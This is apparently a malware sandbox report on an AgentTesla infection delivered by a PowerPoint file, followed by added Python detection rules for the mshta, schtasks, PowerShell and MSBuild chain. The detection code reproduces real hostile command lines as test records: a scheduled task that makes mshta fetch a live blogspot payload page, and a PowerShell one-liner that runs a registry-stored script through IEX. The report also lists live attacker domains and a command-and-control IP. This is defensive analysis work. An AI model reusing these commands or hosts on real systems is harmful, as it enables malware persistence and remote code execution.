Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
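The process-creation and memory-write lines in this section are the whole detection story of the sample: an Office process spawns mshta, mshta registers a scheduled task that re-launches mshta against a blogspot page, mshta starts PowerShell with a one-liner that reads a script out of the registry value HKCU:\Software\meather and pipes it to IEX, and that PowerShell then writes an MZ header into MSBuild.exe at 0x400000. The following Python is an added example, not part of the Joe Sandbox report, that implements the four Sigma-style rules the report names plus the foreign-PE-write signal and runs them over records constructed from the command lines above. The record layout (parent, image, cmdline; source, target, base, first_bytes) is this example's own assumption rather than any sandbox export format, and the stage-1 URL in the first record is a placeholder because the report only shows that mshta reached j.mp.

```python
"""Detection logic for the Office -> mshta -> schtasks / powershell -> MSBuild chain.
Records below are constructed to mirror the report's lines; the record layout is an
assumption of this example and is not Joe Sandbox's export format."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line of the created process


@dataclass(frozen=True)
class MemWrite:
    source: str         # process performing the write
    target: str         # process whose memory is written
    base: int           # target address of the write
    first_bytes: bytes  # leading bytes of the written buffer


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# "(gp HKCU:\Software).<value> | IEX": a script stored in a registry value is executed.
REG_TO_IEX = re.compile(
    r"\(\s*(?:gp|get-itemproperty)\s+HK(?:CU|LM)[^)]*\)\s*\.\s*\w+\s*\)?\s*\|\s*"
    r"(?:iex|invoke-expression)\b",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: ProcEvent) -> bool:
    return basename(ev.parent) in OFFICE and basename(ev.image) in SHELLS


def mshta_spawns_shell(ev: ProcEvent) -> bool:
    return basename(ev.parent) == "mshta.exe" and basename(ev.image) in SHELLS - {"mshta.exe"}


def schtasks_runs_mshta_from_internet(ev: ProcEvent) -> bool:
    """schtasks /create whose /tr action runs mshta with a URL or a vbscript: payload."""
    c = ev.cmdline
    if basename(ev.image) != "schtasks.exe" or "/create" not in c.lower():
        return False
    action = re.search(r"/tr\s+(.*)$", c, re.IGNORECASE | re.DOTALL)
    if not action:
        return False
    a = action.group(1).lower()
    return "mshta" in a and ("://" in a or "vbscript:" in a)


def powershell_runs_code_from_registry(ev: ProcEvent) -> bool:
    return basename(ev.image) in {"powershell.exe", "pwsh.exe"} and bool(REG_TO_IEX.search(ev.cmdline))


def foreign_pe_write(w: MemWrite) -> bool:
    """A PE header (MZ, bytes 4D 5A) written into another process's memory."""
    return basename(w.source) != basename(w.target) and w.first_bytes[:2] == b"MZ"


PROC_RULES = {
    "Microsoft Office Product Spawning Windows Shell": office_spawns_shell,
    "MSHTA Spawning Windows Shell": mshta_spawns_shell,
    "Schedule script from internet via mshta": schtasks_runs_mshta_from_internet,
    "Powershell execute code from registry": powershell_runs_code_from_registry,
}


def detect(events, writes):
    """Map each rule that fired to the indices of the records that triggered it."""
    hits = {}
    for i, ev in enumerate(events):
        for name, rule in PROC_RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(i)
    for i, w in enumerate(writes):
        if foreign_pe_write(w):
            hits.setdefault("Injects a PE file into a foreign process", []).append(i)
    return hits


# Constructed records modelled on the report's lines (the stage-1 URL is a placeholder).
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE", MSHTA,
              "mshta.exe https://example.invalid/stage1"),
    ProcEvent(MSHTA, r"C:\Windows\System32\schtasks.exe",
              r'''schtasks.exe /create /sc MINUTE /mo 80 /tn "lunkicharkhi" /F /tr "mshta vbscript:Execute('CreateObject(\"Wscript.Shell\").Run \"mshta https://randikhanaekminar.blogspot.com/p/st2.html\", 0 : window.close')"'''),
    ProcEvent(MSHTA, PS32, r"powershell.exe -noexit ((gp HKCU:\Software).meather)|IEX"),
    ProcEvent(MSHTA, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", PS32, r"powershell.exe -File C:\scripts\backup.ps1"),  # benign control
]
WRITES = [
    MemWrite(PS32, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", 0x400000, bytes.fromhex("4D5A9000")),
    MemWrite(PS32, PS32, 0x01D80000, b"\x00\x00"),  # a process writing its own memory is not injection
]

if __name__ == "__main__":
    for rule, idx in detect(EVENTS, WRITES).items():
        print(f"{rule}: records {idx}")
```

Run stand-alone it lists every rule that fires with the index of the triggering record; the explorer.exe-launched PowerShell and the self-write trigger nothing. The registry rule is deliberately narrow (Get-ItemProperty on HKCU/HKLM whose property is piped straight to IEX) because that is the exact shape on this page; a production rule would also cover `-EncodedCommand` and `Get-ItemPropertyValue` variants.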

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match | File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2361625874.000000000461E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2353771380.00000000045FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2295286876.00000000026F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Source: Yara match | File source: 29.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

One row per technique slot; a number after a technique is the report's signature-count badge for that technique, kept as it appeared. Empty cells are empty in the report.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Spearphishing Link 1 | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Extra Window Memory Injection 1 | Disable or Modify Tools 111 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 32 | Registry Run Keys / Startup Folder 31 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | System Information Discovery 116 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Process Injection 211 | Scripting 32 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Encrypted Channel 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 11 | Logon Script (Mac) | Scheduled Task/Job 1 | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 111 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Scheduled Task/Job 1 | Network Logon Script | Registry Run Keys / Startup Folder 31 | Extra Window Memory Injection 1 | LSA Secrets | Virtualization/Sandbox Evasion 13 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 14 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 13 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Remote System Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 211 | /etc/passwd and /etc/shadow | System Network Configuration Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

              Behavior Graph

Behavior Graph ID: 339086 | Sample: BankSwiftCopyUSD95000.ppt | Start date: 13/01/2021 | Architecture: WINDOWS | Score: 100

The graph, rewritten as a process tree (network contacts after the process name; matched signatures in square brackets):

BankSwiftCopyUSD95000.ppt (root): www.blogger.com, startthepartyup.blogspot.com, 4 other IPs or domains
  [Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected AgentTesla; 15 other signatures]
  cmd.exe
    POWERPNT.EXE  [Document exploit detected (process start blacklist hit)]
      mshta.exe: j.mp 67.199.248.16, 49167, 80 (GOOGLE-PRIVATE-CLOUDUS, United States); blogspot.l.googleusercontent.com 108.177.127.132, 443, 49168, 49176 (GOOGLEUS, United States); 3 other IPs or domains
        [Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows; Creates a scheduled task launching mshta.exe (likely to bypass HIPS)]
        powershell.exe: paste.ee 104.18.49.20, 443, 49174, 49183 (CLOUDFLARENETUS, United States)
          [Writes to foreign memory regions; Injects a PE file into a foreign processes]
          MSBuild.exe: 64.188.18.218, 49197, 49198, 49201 (ASN-QUADRANET-GLOBALUS, United States)
            [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)]
        cmd.exe
          taskkill.exe
          taskkill.exe
        schtasks.exe
      PING.EXE  [Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)]
      PING.EXE
  taskeng.exe
    mshta.exe
      mshta.exe: www.blogger.com; randikhanaekminar.blogspot.com
        powershell.exe
  mshta.exe
    mshta.exe: www.blogger.com; 2 other IPs or domains
      powershell.exe: 172.67.219.133, 443, 49193 (CLOUDFLARENETUS, United States); paste.ee  [Injects a PE file into a foreign processes]
  4 other processes
    powershell.exe: paste.ee
    mshta.exe: www.blogger.com; 2 other IPs or domains
    mshta.exe: www.blogger.com; 2 other IPs or domains


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              BankSwiftCopyUSD95000.ppt35%VirustotalBrowse
              BankSwiftCopyUSD95000.ppt22%ReversingLabsScript-Macro.Downloader.Heuristic
              BankSwiftCopyUSD95000.ppt100%AviraHEUR/Macro.Downloader.MRKQ.Gen
              BankSwiftCopyUSD95000.ppt100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              29.2.MSBuild.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              j.mp0%VirustotalBrowse

              URLs

              Source                                                                                     Detection  Scanner          Label  Link
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0                                  0%         URL Reputation   safe
              http://www.diginotar.nl/cps/pkioverheid0                                                   0%         URL Reputation   safe
              https://mainjigijigi123.blogspot                                                           0%         Avira URL Cloud  safe
              https://mainjigijigi123.blogs                                                              0%         Avira URL Cloud  safe
              http://ocsp.pki.goog/gts1o1core0                                                           0%         URL Reputation   safe
              http://crl.pki.goog/GTS1O1core.crl0                                                        0%         URL Reputation   safe
              https://i18n-cloud.appspot.com                                                             0%         Virustotal              Browse
              https://i18n-cloud.appspot.com                                                             0%         Avira URL Cloud  safe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip  0%         URL Reputation   safe
              http://pki.goog/gsr2/GTS1O1.crt0                                                           0%         URL Reputation   safe
              http://ocsp.pki.goog/gs                                                                    0%         Avira URL Cloud  safe
              http://ocsp.pki.goog/gsr202                                                                0%         URL Reputation   safe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true                                0%         URL Reputation   safe
              https://pki.goog/repository/0                                                              0%         URL Reputation   safe
              http://crl.pki.goog/gsr2/gsr2.crl0?                                                        0%         URL Reputation   safe

              Domains and IPs

              Contacted Domains

              Name                               IP               Active   Malicious  Antivirus Detection  Reputation
              paste.ee                           104.18.49.20     true     false                           high
              blogspot.l.googleusercontent.com   108.177.127.132  true     false                           high
              j.mp                               67.199.248.16    true     true                            unknown
              ghostbackbone123.blogspot.com      unknown          unknown  false                           high
              startthepartyup.blogspot.com       unknown          unknown  false                           high
              backbones1234511a.blogspot.com     unknown          unknown  false                           high
              mainjigijigi123.blogspot.com       unknown          unknown  false                           high
              randikhanaekminar.blogspot.com     unknown          unknown  false                           high
              www.blogger.com                    unknown          unknown  false                           high
              resources.blogblog.com             unknown          unknown  false                           high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.cssmshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpfalse
                                    high
                                    https://mainjigijigi123.blogspot.com/js/cookienotice.jspngamshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                      high
                                      https://www.blogger.commshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpfalse
                                        high
                                        https://www.blogger.com/go/privacymshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                            high
                                            https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pimshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpfalse
                                              high
                                              https://resources.blogblog.com/img/icon18_wrench_allbkg.pngkmshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpfalse
                                                high
                                                https://resources.blogblog.com/img/icon18_wrench_allbkg.pngqmshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=pencimshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.jsmshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://www.blogger.com/unvisited-link-mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://mainjigijigi123.blogspotmshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.blogger.com/img/share_buttons_20_3.pngmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://www.blogger.com/img/share_buttons_20_3.pngamshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://resources.blogblog.com/img/triangle_ltr.gif)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.youtube.commshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://www.blogger.com/go/discussmshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://mainjigijigi123.blogsmshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://mainjigijigi123.blogspot.com/js/cookienotice.jspmshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://www.blogger.com/img/share_buttons_20_3.pngvmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://ocsp.pki.goog/gts1o1core0mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://resources.blogblog.com/img/widgets/s_top.pngmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjamshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://crl.pki.goog/GTS1O1core.crl0mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://i18n-cloud.appspot.commshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                    • 0%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://mainjigijigi123.blogspot.com/js/cookienotice.jsimshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://mainjigijigi123.blogspot.com/js/cookienotice.jsmshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsmshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://mainjigijigi123.blogspot.com/feeds/posts/defaultmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://www.blogger.com/img/share_buttons_20_3.pngxmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schema.org/BlogPostingmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                high
